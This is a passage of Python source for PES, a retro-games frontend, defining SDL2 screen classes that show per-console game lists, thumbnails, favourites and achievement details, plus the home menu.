logging.debug("PESLoadingThread.run: loaded %d timezones" % len(self.app.timezones))
process = Popen(self.app.config.getTimezoneCommand, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = process.communicate()
if process.returncode != 0:
logging.error("PESLoadingThread.run: could not get current time zone!")
logging.error(stderr)
else:
self.app.currentTimezone = stdout[:-1]
logging.debug("PESLoadingThread.run: current timezone is: %s" % self.app.currentTimezone)
self.progress = 64
self.status = "Loading surfaces..."
self.app.initSurfaces()
self.progress = 80
self.status = "Preparing screens..."
self.app.initScreens()
self.progress = 100
self.status = "Complete!"
time.sleep(0.1)
pes.event.pushPesEvent(pes.event.EVENT_RESOURCES_LOADED)
logging.debug("PESLoadingThread.run: %d complete" % self.progress)
self.done = True
return
class Screen(object):
def __init__(self, app, renderer, title, menu, menuRect, screenRect):
super(Screen, self).__init__()
self.title = title
self.app = app
self.renderer = renderer
self.menu = menu
self.menuRect = menuRect
self.screenRect = screenRect
self.menuActive = True
self.justActivated = False
self.__menuMargin = 5
self.__menuTopMargin = 10
self.__menuItemChanged = False
self.screenMargin = 10
self.wrap = self.screenRect[2] - (self.screenMargin * 2)
self.__uiObjects = []
if self.menu:
self.menu.setSelected(0)
self.__menuList = self.addUiObject(List(self.renderer, self.__menuMargin + self.menuRect[0], self.menuRect[1] + self.__menuTopMargin, self.menuRect[2] - (self.__menuMargin * 2), self.menuRect[3] - (self.menuRect[1] + self.__menuTopMargin), self.menu, self.app.menuFont, self.app.menuTextColour, self.app.menuSelectedTextColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_DISABLED, labelMargin=0))
self.__menuList.setFocus(True)
def addUiObject(self, o):
if o not in self.__uiObjects:
self.__uiObjects.append(o)
return o
def draw(self):
if self.menu:
self.drawMenu()
self.drawScreen()
def drawMenu(self):
sdl2.sdlgfx.boxRGBA(self.renderer, self.menuRect[0], self.menuRect[1], self.menuRect[0] + self.menuRect[2], self.menuRect[1] + self.menuRect[3], self.app.menuBackgroundColour.r, self.app.menuBackgroundColour.g, self.app.menuBackgroundColour.b, 255)
self.__menuList.draw()
def drawScreen(self):
sdl2.sdlgfx.boxRGBA(self.renderer, self.screenRect[0], self.screenRect[1], self.screenRect[0] + self.screenRect[2], self.screenRect[1] + self.screenRect[3], self.app.backgroundColour.r, self.app.backgroundColour.g, self.app.backgroundColour.b, 255)
def isBusy(self):
return False
def processEvent(self, event):
if self.menuActive and event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RETURN or event.key.keysym.sym == sdl2.SDLK_KP_ENTER:
self.menu.getSelectedItem().trigger()
self.setMenuActive(False)
self.__menuList.setFocus(False)
self.justActivated = True
else:
self.justActivated = False
self.__menuList.processEvent(event)
elif not self.menuActive:
self.justActivated = False
def removeUiObject(self, o):
if o in self.__uiObjects:
self.__uiObjects.remove(o)
def select(self, index):
if self.menu:
self.menu.setSelected(0, True)
def setMenuActive(self, active):
if self.menu:
self.menuActive = active
self.__menuList.setFocus(active)
logging.debug("Screen.setMenuActive: \"%s\" activate state is now: %s" % (self.title, self.menuActive))
def stop(self):
uiObjectLen = len(self.__uiObjects)
if uiObjectLen > 0:
logging.debug("Screen.stop: Destroying %d UI objects..." % uiObjectLen)
for o in self.__uiObjects:
o.destroy()
class ConsoleScreen(Screen):
def __init__(self, app, renderer, menuRect, screenRect, console):
super(ConsoleScreen, self).__init__(app, renderer, console.getName(), Menu([
MenuItem("Favourites"),
MenuItem("Recently Played"),
MenuItem("Most Played"),
MenuItem("Recently Added"),
MenuItem("Have Badges"),
MenuItem("All")
]),
menuRect, screenRect)
self.__console = console
self.__consoleName = console.getName()
self.menu.setSelected(0)
self.__thumbXGap = 20
self.__thumbYGap = 10
self.__showThumbs = 10
self.__desiredThumbWidth = int((screenRect[2] - (self.__showThumbs * self.__thumbXGap)) / self.__showThumbs)
img = Image.open(console.getNoCoverArtImg())
img.close()
self.__noCoverArtWidth, self.__noCoverArtHeight = img.size
self.__thumbRatio = float(self.__noCoverArtHeight) / float(self.__noCoverArtWidth)
self.__thumbWidth = self.__desiredThumbWidth
self.__thumbHeight = int(self.__thumbRatio * self.__thumbWidth)
self.__consoleTexture = None
self.__titleLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], "%s: %s" % (self.__consoleName, self.menu.getSelectedItem().getText()),
self.app.titleFont, self.app.textColour, fixedWidth=self.wrap))
self.__noGamesFoundLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__titleLabel.y + (self.__titleLabel.height * 2), "No games found.", self.app.bodyFont, self.app.textColour))
self.__descriptionLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__titleLabel.y + (self.__titleLabel.height * 2), " ", self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
self.__allGamesList = None
self.__recentlyAddedGamesList = None
self.__favouritesList = None
self.__recentlyPlayedList = None
self.__mostPlayedList = None
self.__achievementsList = None
self.__gameInfoLabel = None
self.__gameOverviewLabel = None
self.__previewThumbnail = None
self.__listX = self.screenRect[0] + self.screenMargin
self.__listY = self.__titleLabel.y + (self.__titleLabel.height * 2)
self.__listWidth = 300
self.__listHeight = self.screenRect[1] + self.screenRect[3] - self.__listY - self.screenMargin
self.__previewThumbnailX = self.__listX + self.__listWidth
self.__previewThumbnailWidth, self.__previewThumbnailHeight = scaleImage((self.__noCoverArtWidth, self.__noCoverArtHeight), (self.screenRect[0] + self.screenRect[2] - self.__previewThumbnailX - 50, int((self.screenRect[3] - self.screenRect[1]) / 2)))
self.__previewThumbnailX += int((((self.screenRect[0] + self.screenRect[2]) - self.__previewThumbnailX) / 2) - (self.__previewThumbnailWidth / 2))
self.__previewThumbnailY = self.__listY
self.__gameInfoLabelX = self.__listX + self.__listWidth + 50
self.__gameInfoLabelY = self.__previewThumbnailY + self.__previewThumbnailHeight + 10
self.__gameInfoLabelWidth = self.screenRect[0] + self.screenRect[2] - self.__gameInfoLabelX - 5
self.__gameInfoLabelHeight = 6 * sdl2.sdlttf.TTF_FontHeight(self.app.bodyFont)
self.__gameInfoLabel = self.addUiObject(Label(self.renderer, self.__gameInfoLabelX, self.__gameInfoLabelY, " ", self.app.bodyFont, self.app.textColour, fixedWidth=self.__gameInfoLabelWidth,
fixedHeight=self.__gameInfoLabelHeight, bgColour=self.app.menuTextColour, bgAlpha=50))
self.__gameOverviewLabelX = self.__gameInfoLabelX
self.__gameOverviewLabelY = self.__gameInfoLabelY + self.__gameInfoLabelHeight
self.__gameOverviewLabel = self.addUiObject(Label(self.renderer, self.__gameInfoLabelX, self.__gameOverviewLabelY, " ", self.app.bodyFont, self.app.textColour, fixedWidth=self.__gameInfoLabelWidth, fixedHeight=(self.screenRect[1] + self.screenRect[3] - self.__gameOverviewLabelY - self.screenMargin), autoScroll=True, bgColour=self.app.menuTextColour, bgAlpha=50))
self.__recentlyAddedThumbPanel = None
self.__recentlyPlayedThumbPanel = None
self.__mostPlayedThumbPanel = None
self.__favouriteThumbPanel = None
self.__achievementsThumbPanel = None
self.__allGamesThumbPanel = None
self.refreshNeeded = True
#self.refresh()
logging.debug("ConsoleScreen.init: initialised for %s" % self.__consoleName)
def __createMenu(self, games):
menu = Menu([])
for g in games:
m = GameMenuItem(g, False, True, self.__playGame, g)
m.toggle(g.isFavourite())
menu.addItem(m)
return menu
def __createPreviewThumbnail(self, game):
if self.__previewThumbnail == None:
self.__previewThumbnail = self.addUiObject(Thumbnail(self.renderer, self.__previewThumbnailX, self.__previewThumbnailY, self.__previewThumbnailWidth, self.__previewThumbnailHeight, game, self.app.bodyFont, self.app.textColour, False))
def drawScreen(self):
if self.refreshNeeded:
self.refresh()
if self.__consoleTexture == None:
self.__consoleTexture = sdl2.SDL_CreateTextureFromSurface(self.renderer, self.app.consoleSurfaces[self.__consoleName])
sdl2.SDL_SetTextureAlphaMod(self.__consoleTexture, CONSOLE_TEXTURE_ALPHA)
sdl2.SDL_RenderCopy(self.renderer, self.__consoleTexture, None, sdl2.SDL_Rect(self.screenRect[0], self.screenRect[1], self.screenRect[2], self.screenRect[3]))
self.__titleLabel.draw()
selectedText = self.menu.getSelectedItem().getText()
if self.menuActive:
if selectedText == "Recently Added":
self.__recentlyAddedThumbPanel.draw()
elif selectedText == "Recently Played":
if self.__recentlyPlayedGamesTotal > 0 and self.__recentlyPlayedThumbPanel:
self.__recentlyPlayedThumbPanel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Favourites":
if self.__favouriteGamesTotal > 0 and self.__favouriteThumbPanel:
self.__favouriteThumbPanel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Have Badges":
if self.__gamesWithAchievementsTotal > 0 and self.__achievementsThumbPanel:
self.__achievementsThumbPanel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Most Played":
if self.__mostPlayedGamesTotal > 0 and self.__mostPlayedThumbPanel:
self.__mostPlayedThumbPanel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "All":
#self.__descriptionLabel.draw()
self.__allGamesThumbPanel.draw()
else:
if selectedText == "Recently Added":
self.__recentlyAddedGamesList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
elif selectedText == "Recently Played":
if self.__recentlyPlayedGamesTotal > 0:
self.__recentlyPlayedList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Favourites":
if self.__favouriteGamesTotal > 0:
self.__favouritesList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Have Badges":
if self.__gamesWithAchievementsTotal > 0:
self.__achievementsList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Most Played":
if self.__mostPlayedGamesTotal > 0:
self.__mostPlayedList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "All":
self.__allGamesList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
def __getGameInfoText(self, game):
lastPlayed = "N/A"
playCount = game.getPlayCount()
if playCount > 0:
lastPlayed = game.getLastPlayed("%d/%m/%Y")
achievementInfo = "N/A"
if self.app.retroAchievementConn and self.app.achievementUser and game.hasAchievements():
achievementGame = self.app.achievementUser.getGame(game.getAchievementApiId())
achievementInfo = "%d%% complete, %d points" % (achievementGame.getPercentComplete(), achievementGame.getUserPointsTotal())
return "File name: %s\nReleased: %s\nPlay Count: %d\nLast Played: %s\nSize: %s\nBadges: %s\nOverview:" % (os.path.basename(game.getPath()), game.getReleased("%d/%m/%Y"), playCount, lastPlayed, game.getSize(True), achievementInfo)
def __playGame(self, game):
if self.app.retroAchievementConn and self.app.achievementUser and game.hasAchievements():
self.app.screens["Play"].setGame(game)
self.app.setScreen("Play")
else:
self.app.playGame(game)
def processEvent(self, event):
super(ConsoleScreen, self).processEvent(event)
if self.menuActive:
if event.type == sdl2.SDL_KEYDOWN and (event.key.keysym.sym == sdl2.SDLK_UP or event.key.keysym.sym == sdl2.SDLK_DOWN or event.key.keysym.sym == sdl2.SDLK_BACKSPACE):
selectedText = self.menu.getSelectedItem().getText()
self.__titleLabel.setText("%s: %s" % (self.__consoleName, selectedText))
if selectedText == "All":
self.__descriptionLabel.setText("Browse all %d games." % self.__console.getGameTotal(), True)
elif selectedText == "Search":
self.__descriptionLabel.setText("Search for games here.", True)
if self.__searchLabel:
self.__searchLabel.setFocus(False)
self.__searchLabel.setVisible(False)
else:
if event.type == sdl2.SDL_KEYUP:
selectedText = self.menu.getSelectedItem().getText()
if selectedText == "All" and self.__allGamesList:
self.__allGamesList.processEvent(event)
elif selectedText == "Recently Added" and self.__recentlyAddedGamesList:
self.__recentlyAddedGamesList.processEvent(event)
elif selectedText == "Most Played" and self.__mostPlayedList:
self.__mostPlayedList.processEvent(event)
elif selectedText == "Recently Played" and self.__recentlyPlayedList:
self.__recentlyPlayedList.processEvent(event)
elif selectedText == "Favourites" and self.__favouritesList:
self.__favouritesList.processEvent(event)
elif selectedText == "Have Badges" and self.__achievementsList:
self.__achievementsList.processEvent(event)
elif event.type == sdl2.SDL_KEYDOWN:
selectedText = self.menu.getSelectedItem().getText()
if self.justActivated and (event.key.keysym.sym == sdl2.SDLK_RETURN or event.key.keysym.sym == sdl2.SDLK_KP_ENTER):
if selectedText == "All" and self.__allGamesList == None:
self.__allGamesList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__allGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__allGamesList.setFocus(True)
self.__allGamesList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__allGames[0]))
self.__gameOverviewLabel.setText(self.__allGames[0].getOverview())
self.__createPreviewThumbnail(self.__allGames[0])
elif selectedText == "Recently Added" and self.__recentlyAddedGamesList == None:
self.__recentlyAddedGamesList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__recentlyAddedGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__recentlyAddedGamesList.setFocus(True)
self.__recentlyAddedGamesList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__recentlyAddedGames[0]))
self.__gameOverviewLabel.setText(self.__recentlyAddedGames[0].getOverview())
self.__createPreviewThumbnail(self.__recentlyAddedGames[0])
elif selectedText == "Most Played" and self.__mostPlayedList == None:
if self.__mostPlayedGamesTotal > 0:
self.__mostPlayedList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__mostPlayedGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__mostPlayedList.setFocus(True)
self.__mostPlayedList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__mostPlayedGames[0]))
self.__gameOverviewLabel.setText(self.__mostPlayedGames[0].getOverview())
self.__createPreviewThumbnail(self.__mostPlayedGames[0])
elif selectedText == "Recently Played" and self.__recentlyPlayedList == None:
if self.__recentlyPlayedGamesTotal > 0:
self.__recentlyPlayedList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__recentlyPlayedGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__recentlyPlayedList.setFocus(True)
self.__recentlyPlayedList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__recentlyPlayedGames[0]))
self.__gameOverviewLabel.setText(self.__recentlyPlayedGames[0].getOverview())
self.__createPreviewThumbnail(self.__recentlyPlayedGames[0])
elif selectedText == "Favourites" and self.__favouritesList == None:
if self.__favouriteGamesTotal > 0:
self.__favouritesList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__favouriteGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__favouritesList.setFocus(True)
self.__favouritesList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__favouriteGames[0]))
self.__gameOverviewLabel.setText(self.__favouriteGames[0].getOverview())
self.__createPreviewThumbnail(self.__favouriteGames[0])
elif selectedText == "Have Badges" and self.__achievementsList == None:
if self.__gamesWithAchievementsTotal > 0:
self.__achievementsList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__gamesWithAchievements), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__achievementsList.setFocus(True)
self.__achievementsList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__gamesWithAchievements[0]))
self.__gameOverviewLabel.setText(self.__gamesWithAchievements[0].getOverview())
self.__createPreviewThumbnail(self.__gamesWithAchievements[0])
else:
if selectedText == "All":
self.__allGamesList.processEvent(event)
elif selectedText == "Recently Added":
self.__recentlyAddedGamesList.processEvent(event)
elif selectedText == "Favourites" and self.__favouritesList:
self.__favouritesList.processEvent(event)
elif selectedText == "Most Played" and self.__mostPlayedList:
self.__mostPlayedList.processEvent(event)
elif selectedText == "Recently Played" and self.__recentlyPlayedList:
self.__recentlyPlayedList.processEvent(event)
elif selectedText == "Have Badges" and self.__achievementsList:
self.__achievementsList.processEvent(event)
def processListEvent(self, uiList, eventType, item):
if eventType == List.LISTEN_ITEM_SELECTED:
if self.__previewThumbnail:
game = item.getGame()
self.__previewThumbnail.setGame(game)
self.__gameInfoLabel.setText(self.__getGameInfoText(game))
self.__gameOverviewLabel.setText(game.getOverview())
if eventType == List.LISTEN_ITEM_TOGGLED:
g = item.getGame()
g.setFavourite(item.isToggled())
g.save()
self.__updateFavourites()
def refresh(self):
logging.debug("ConsoleScreen.refresh: reloading content for %s..." % self.__consoleName)
start = time.time()
# all games
self.__allGames = self.__console.getGames()
self.__allGamesTotal = len(self.__allGames)
if self.__allGamesList:
self.__allGamesList.setMenu(self.__createMenu(self.__allGames))
if self.__allGamesThumbPanel:
self.__allGamesThumbPanel.setGames(self.__allGames[0:self.__showThumbs])
else:
self.__allGamesThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__allGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
# recently added
recentlyAddedGameIds = self.__console.getRecentlyAddedGameIds()
self.__recentlyAddedGamesTotal = len(recentlyAddedGameIds)
self.__recentlyAddedGames = []
for i in recentlyAddedGameIds:
self.__recentlyAddedGames.append(self.__console.getGame(i))
if self.__recentlyAddedGamesList:
self.__recentlyAddedGamesList.setMenu(self.__createMenu(self.__recentlyAddedGames))
if self.__recentlyAddedThumbPanel:
self.__recentlyAddedThumbPanel.setGames(self.__recentlyAddedGames[0:self.__showThumbs])
else:
self.__recentlyAddedThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__recentlyAddedGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
# most played
mostPlayedGameIds = self.__console.getMostPlayedGameIds()
self.__mostPlayedGamesTotal = len(mostPlayedGameIds)
self.__mostPlayedGames = []
if self.__mostPlayedGamesTotal > 0:
for i in mostPlayedGameIds:
self.__mostPlayedGames.append(self.__console.getGame(i))
if self.__mostPlayedList:
self.__mostPlayedList.setMenu(self.__createMenu(self.__mostPlayedGames))
if self.__mostPlayedThumbPanel:
self.__mostPlayedThumbPanel.setGames(self.__mostPlayedGames[0:self.__showThumbs])
else:
self.__mostPlayedThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__mostPlayedGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
# recently played
recentlyPlayedGameIds = self.__console.getRecentlyPlayedGameIds()
self.__recentlyPlayedGamesTotal = len(recentlyPlayedGameIds)
self.__recentlyPlayedGames = []
if self.__recentlyPlayedGamesTotal > 0:
for i in recentlyPlayedGameIds:
self.__recentlyPlayedGames.append(self.__console.getGame(i))
if self.__recentlyPlayedList:
self.__recentlyPlayedList.setMenu(self.__createMenu(self.__recentlyPlayedGames))
if self.__recentlyPlayedThumbPanel:
self.__recentlyPlayedThumbPanel.setGames(self.__recentlyPlayedGames[0:self.__showThumbs])
else:
self.__recentlyPlayedThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__recentlyPlayedGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
# games with achievements
gamesWithAchievementIds = self.__console.getGamesWithAchievementIds()
self.__gamesWithAchievementsTotal = len(gamesWithAchievementIds)
self.__gamesWithAchievements = []
if self.__gamesWithAchievementsTotal > 0:
for i in gamesWithAchievementIds:
self.__gamesWithAchievements.append(self.__console.getGame(i))
if self.__achievementsList:
self.__achievementsList.setMenu(self.__createMenu(self.__gamesWithAchievements))
if self.__achievementsThumbPanel:
self.__achievementsThumbPanel.setGames(self.__gamesWithAchievements[0:self.__showThumbs])
else:
self.__achievementsThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__gamesWithAchievements[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
self.__updateFavourites()
self.refreshNeeded = False
logging.debug("ConsoleScreen.__refresh: time taken = %0.02fs" % (time.time() - start))
def __updateFavourites(self):
self.__favouriteGames = []
favouriteGameIds = self.__console.getFavouriteIds()
self.__favouriteGamesTotal = len(favouriteGameIds)
logging.debug("ConsoleScreen.__updateFavourites: favourite total: %d" % self.__favouriteGamesTotal)
if self.__favouriteGamesTotal > 0:
for i in favouriteGameIds:
self.__favouriteGames.append(self.__console.getGame(i))
if self.__favouritesList:
self.__favouritesList.setMenu(self.__createMenu(self.__favouriteGames))
if self.__favouriteThumbPanel:
self.__favouriteThumbPanel.setGames(self.__favouriteGames[0:self.__showThumbs])
else:
self.__favouriteThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__favouriteGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
if self.menu.getSelectedItem().getText() == "Favourites":
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__favouriteGames[0]))
self.__gameOverviewLabel.setText(self.__favouriteGames[0].getOverview())
if self.__previewThumbnail != None:
self.__previewThumbnail.setGame(self.__favouriteGames[0])
else:
if self.__favouritesList:
self.__favouritesList.destroy()
self.__favouritesList = None
def stop(self):
super(ConsoleScreen, self).stop()
logging.debug("ConsoleScreen.stop: deleting textures for %s..." % self.__consoleName)
if self.__consoleTexture:
sdl2.SDL_DestroyTexture(self.__consoleTexture)
class HomeScreen(Screen):
def __init__(self, app, renderer, menuRect, screenRect):
super(HomeScreen, self).__init__(app, renderer, "Home", Menu([MenuItem("Home")]), menuRect, screenRect)
#super(HomeScreen, self).__init__(app, renderer, "Home", Menu([MenuItem("Achievements", False, False, app.setScreen, "Achievements")]), menuRect, screenRect)
for c in self.app.consoles:
if c.getGameTotal() > 0:
self.menu.addItem(ConsoleMenuItem(c, False, False, self.__loadConsoleScreen, c))
if self.app.config.kodiCommand:
self.menu.addItem(MenuItem("Kodi", False, False, self.app.runKodi))
self.menu.addItem(MenuItem("Settings", False, False, self.app.setScreen, "Settings"))
self.menu.addItem(MenuItem("Reload", False, False, self.app.reload))
self.menu.addItem(MenuItem("Reboot", False, False, self.app.reboot))
self.menu.addItem(MenuItem("Power Off", False, False, self.app.shutdown))
self.menu.addItem(MenuItem("Exit", False, False, self.app.exit, 0, True))
self.__thumbXGap = 20
self.__thumbYGap = 10
self.__showThumbs = 10
self.__desiredThumbWidth = int((screenRect[2] - (self.__showThumbs * self.__thumbXGap)) / self.__showThumbs)
self.__consoleTexture = None
self.__consoleSelected = False
self.__consoleName = None
self.__headerLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], "Welcome to PES!", self.app.titleFont, self.app.textColour))
#self.__headerLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], "Achievements", self.app.titleFont, self.app.textColour))
self.__gamesAdded = self.app.getGameTotal() > 0
self.__noGamesAddedWelcomeText = "Before you can start playing any games, please add some to PES and then go to \"Update Games\" under the \"Settings\" screen.\n\nNote: if you sign up for an account at www.retroachievements.org and enter your details into your pes.ini file, PES will show your achievements here.\n\nFor help please visit http://pes.mundayweb.com."
self.__gamesAddedWelcomeText = "Please select an item from the menu on the left.\n\nNote: if you sign up for an account at www.retroachievements.org and enter your details into your pes.ini file, PES will show your achievements here.\n\nFor help please visit http://pes.mundayweb.com."
if self.__gamesAdded:
self.__welcomeText = self.__gamesAddedWelcomeText
else:
self.__welcomeText = self.__noGamesAddedWelcomeText
self.__descriptionLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), self.__welcomeText, self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
#self.__descriptionLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), "BLAH", self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
self.__recentlyAddedText = "Recently Added"
self.__recentlyAddedLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), self.__recentlyAddedText, self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
self.__recentlyPlayedLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), "Recently Played", self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
self.__recentlyAddedThumbPanels = {}
self.__recentlyPlayedThumbPanels = {}
self.__badgePanels = []
self.__initBadges = True # hack to make sure badges are not initialised inside the PES loading thread
logging.debug("HomeScreen.init: initialised")
def __doNothing(self):
self.setMenuActive(True)
def drawScreen(self):
super(HomeScreen, self).drawScreen()
self.__headerLabel.draw()
if self.__consoleSelected:
sdl2.SDL_RenderCopy(self.renderer, self.__consoleTexture, None, sdl2.SDL_Rect(self.screenRect[0], self.screenRect[1], self.screenRect[2], self.screenRect[3]))
self.__recentlyAddedLabel.draw()
if self.__consoleName in self.__recentlyAddedThumbPanels:
self.__recentlyAddedThumbPanels[self.__consoleName].draw()
if self.__consoleName in self.__recentlyPlayedThumbPanels:
self.__recentlyPlayedThumbPanels[self.__consoleName].draw()
self.__recentlyPlayedLabel.draw()
elif self.menu.getSelectedItem().getText() == "Home":
if self.__initBadges:
self.updateRecentBadges()
self.__initBadges = False
self.__descriptionLabel.draw()
for p in self.__badgePanels:
p.draw()
else:
self.__descriptionLabel.draw()
def __loadConsoleScreen(self, console):
screenName = "Console %s" % console.getName()
self.app.screens[screenName].refresh()
self.app.setScreen(screenName)
def loadTextures(self):
logging.debug("HomeScreen.loadTextures: pre-loading textures for thumb panels...")
for console in self.app.consoles:
if console.getGameTotal() > 0:
games = console.getRecentlyAddedGames(0, self.__showThumbs)
if len(games) > 0:
t = ThumbnailPanel(self.renderer, self.screenRect[0] + self.screenMargin, self.__recentlyAddedLabel.y + self.__recentlyAddedLabel.height + self.__thumbYGap, self.screenRect[2] - self.screenMargin, games, self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs)
t.loadTextures()
self.__recentlyAddedThumbPanels[console.getName()] = self.addUiObject(t)
games = console.getRecentlyPlayedGames(0, self.__showThumbs)
if len(games) > 0:
t = ThumbnailPanel(self.renderer, self.screenRect[0] + self.screenMargin, self.__recentlyPlayedLabel.y + self.__recentlyPlayedLabel.height + self.__thumbYGap, self.screenRect[2] - self.screenMargin, games, self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs)
t.loadTextures()
self.__recentlyPlayedThumbPanels[console.getName()] = self.addUiObject(t)
def processEvent(self, event):
super(HomeScreen, self).processEvent(event)
if self.menuActive and event.type == sdl2.SDL_KEYDOWN and (event.key.keysym.sym == sdl2.SDLK_UP or event.key.keysym.sym == sdl2.SDLK_DOWN):
self.update()
elif not self.menuActive and self.menu.getSelectedItem().getText() == "Home" and event.type == sdl2.SDL_KEYDOWN and (event.key.keysym.sym == sdl2.SDLK_KP_ENTER or event.key.keysym.sym == sdl2.SDLK_RETURN):
self.setMenuActive(True)
def refreshMenu(self):
logging.debug("HomeScreen.refreshMenu: refreshing menu contents...")
items = self.menu.getItems()
for m in items:
if isinstance(m, ConsoleMenuItem):
logging.debug("HomeScreen.refreshMenu: removing %s" % m.getText())
self.menu.removeItem(m)
else:
logging.debug("HomeScreen.refreshMenu: not removing %s" % m.getText())
for c in self.app.consoles:
if c.getGameTotal() > 0:
consoleName = c.getName()
logging.debug("HomeScreen.refreshMenu: inserting %s" % consoleName)
menuLength = 5
if self.app.config.kodiCommand:
menuLength += 1
self.menu.insertItem(len(self.menu.getItems()) - menuLength, ConsoleMenuItem(c, False, False, self.app.setScreen, "Console %s" % consoleName))
# update recently added thumbnails
games = c.getRecentlyAddedGames(0, self.__showThumbs)
if consoleName not in self.__recentlyAddedThumbPanels:
if len(games) > 0:
